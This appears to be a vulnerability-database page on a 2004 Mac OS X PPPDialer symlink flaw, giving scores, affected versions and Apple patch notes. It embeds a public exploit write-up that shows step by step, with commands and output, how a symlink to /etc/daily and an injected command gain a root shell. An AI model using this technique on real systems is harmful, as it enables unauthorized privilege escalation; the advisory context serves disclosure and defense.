发布时间 :2004-12-31 00:00:00
修订时间 :2017-07-10 21:30:30

[原文]PPPDialer for Mac OS X 10.2.8 through 10.3.5 allows local users to overwrite system files via a symlink attack on PPPDialer log files.

[CNNVD]Apple PPPDialer不安全记录文件创建符号连接漏洞(CNNVD-200412-633)

        Mac OS X 10.2.8版本到10.3.5版本的PPPDialer存在漏洞。本地用户可以借助对PPPDialer记录文件的符号攻击来覆盖系统文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x:10.2.8Apple Mac OS X 10.2.8
cpe:/o:apple:mac_os_x:10.3.1Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x:10.3Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x:10.3.5Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x:10.3.2Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x:10.3.3Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x:10.3.4Apple Mac OS X 10.3.4

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(PATCH)  SECTRACK  1011175
(PATCH)  BID  11139
(UNKNOWN)  XF  macosx-pppdialer-symlink(17298)

- 漏洞信息

Apple PPPDialer不安全记录文件创建符号连接漏洞
低危 访问验证错误
2004-12-31 00:00:00 2005-10-20 00:00:00
        Mac OS X 10.2.8版本到10.3.5版本的PPPDialer存在漏洞。本地用户可以借助对PPPDialer记录文件的符号攻击来覆盖系统文件。

- 公告与补丁

        Apple has released an advisory (APPLE-SA-0024-09-07) along with fixes to address this, and many other issues. Please see the referenced advisory for further information.
        Apple Mac OS X 10.2.8
        Apple Mac OS X Server 10.2.8
        Apple Mac OS X 10.3.4
        Apple Mac OS X Server 10.3.4
        Apple Mac OS X 10.3.5
        Apple Mac OS X Server 10.3.5

- 漏洞信息 (367)

Mac OS X Panther Internet Connect Local Root Exploit (EDBID:367)
osX local
2004-07-28 Verified
0 B-r00t
N/A [点击下载]
Date: 25.07.2004
Author: B-r00t. 2004.
Email: B-r00t <br00t blueyonder co uk>

Vendor: Apple

System: OSX Panther (Possibly Previous Versions).

Application: Internet

Tested: Panther 10.3.4 (Internet Connect v1.3)

Problem: Internet Connect allows any file on the file
system to be altered.

Status: 0day! - Temporary Fix Included.

Apples Internet Connect application creates a
'ppp.log' file in '/tmp/'. If the file already
exists it is opened in append mode. If it does
not exist a new file is created.

It is possible to trick Internet Connect into
appending data to any file on the filesystem by
creating a symlink file '/tmp/ppp.log' pointing
to the file to be altered.

If the file '/tmp/ppp.log' already exists, the
attack is not possible as the file is owned by
user 'root' and group 'wheel': -

$ ls -l /tmp/ppp.log
-rw-r--r-- 1 root wheel 807 24 Jul 23:44 /tmp/ppp.log

However, due to the Operating System clearing the
'/tmp' directory during system startup and also on
a regular basis due to system maintenance, it
becomes possible to form the attack as shown below:

First a file is created to represent a system file,
owned and only writable by user 'root'.

maki:~ # echo "TEST" > /etc/file_owned_by_root

maki:~ # ls -l /etc/file_owned_by_root
-rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/

maki:~ # cat /etc/file_owned_by_root

A symlink is now created in the '/tmp' directory to
point to the file to be altered. It is important to
realise that the link can be created as a none 'admin'
or 'root' user.

maki:/tmp $ id
uid=502(br00t) gid=502(br00t) groups=502(br00t)

maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log

maki:/tmp $ ls -l ./ppp.log
lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> /

Now Internet Connect is opened. Under 'configuration'
choose 'Other'. Enter some text into the 'Telephone
Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.

'Cancel' can be clicked several seconds later.

Checking the original file '/etc/file_owned_by_root'
we see the following: -

maki:~ $ cat /etc/file_owned_by_root
Sun Jul 25 00:20:42 2004 : Version 2.0
Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
Sun Jul 25 00:20:58 2004 : Serial link disconnected.

As can be seen, data has been appended to the 'protected'

Impact: It is possible for a local user to escalate their
privileges by appending data to specific system files.
In addition, a malicious user may be able to render the
machine unusable by corrupting important system files.

Exploit: This demonstration appends commands to the '/etc/daily'
file which is executed by default at 3:15AM each day.
An alternative attack might involve appending to any
of the files that are sourced at system start up such
as '/etc/rc.common'. This latter method is convenient
if the user is able to reboot the machine.

Create our link
maki:~ $ ln -s /etc/daily /tmp/ppp.log

Open Internet Connect.
Internal Modem -> Configuration -> Other

Internet Connect only allows certain characters to be
used for the telephone number. The background '&'
character allows our command string to execute amongst
the time and date strings also appended.

Telephone Number:
& cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 
sh &

Click 'Connect' ...*wait (10secs) ... 'Cancel'

Check the '/etc/daily' file.
maki:~ $ tail /etc/daily
if [ -f /etc/security ]; then
echo ""
echo "Running security:"
sh /etc/security 2>&1 | sendmail root

Sun Jul 25 03:10:11 2004 : Version 2.0
Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. 
&& cd .. && cd bin && chmod 4755 sh &
Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
Sun Jul 25 03:10:17 2004 : Serial link disconnected.

Now sit back and wait for cron to execute '/etc/daily' at 03:

maki:~ $ date
Sun Jul 25 03:13:43 CEST 2004

maki:~ $ cd /bin

maki:/bin $ ls -l sh
-r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*

maki:/bin $ date
Sun Jul 25 03:15:50 CEST 2004

maki:/bin $ ls -l sh
-rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*

maki:/bin $ sh

maki:/bin # id
uid=502(br00t) euid=0(root) gid=502(br00t) 

All thats left to do is clean up '/etc/daily' and remove the 

FIX: The following commands serve to provide a temporary fix 
Apple release an official update.

Open a terminal: /Applications/Utilities/
Gain root access using 'sudo':

maki:~ $ sudo sh

maki:~ # whoami

You can copy and paste the following commands: -

/usr/bin/touch /tmp/ppp.log
echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily
echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common

These commands ensure that a '/tmp/ppp.log' file is
present to prevent a user from creating a link as shown
above. Alternatively the line:

/usr/bin/touch /tmp/ppp.log

can be added to each file '/etc/daily' and '/etc/rc.common'
manually using an editor and root privileges.

Shoutz: Marshal-L, Ruxsaw, Haggis & Kraft.
s1, Blex & the old #cheese posse (RIP).
Maz ... Good Luck For The Wedding!

# [2004-07-28]

- 漏洞信息

Apple Mac OS X Local Privilege Escalation
Local Access Required Race Condition
Loss of Integrity
Exploit Public

- 漏洞描述

Apple's Internet Connect appliaction contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a user creates a specially crafted symlink against the Internet Connect ppp.log file. This flaw may lead to a loss of Integrity.

- 时间线

2004-07-25 Unknow
2004-07-25 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, B-r00t has released an unofficial patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple PPPDialer Insecure Log File Creation Symbolic Link Vulnerability
Access Validation Error 11139
No Yes
2004-09-07 12:00:00 2009-07-12 07:06:00
This vulnerability was announced in a vendor advisory.

- 受影响的程序版本

Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.2.8

- 漏洞讨论

The Apple PPPDialer utility is reported to contain an insecure log file creation vulnerability. The result of this is that log files created by the application are created in a world writeable location.

A local attacker may possibly exploit this vulnerability to execute symbolic link file overwrite attacks.

Privilege escalation may be possible using this method of attack, if the attacker can control the data that is being written to the target file.

- 漏洞利用

No exploit is required.

- 解决方案

Apple has released an advisory (APPLE-SA-0024-09-07) along with fixes to address this, and many other issues. Please see the referenced advisory for further information.

Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X 10.3.4

Apple Mac OS X Server 10.3.4

Apple Mac OS X 10.3.5

Apple Mac OS X Server 10.3.5

- 相关参考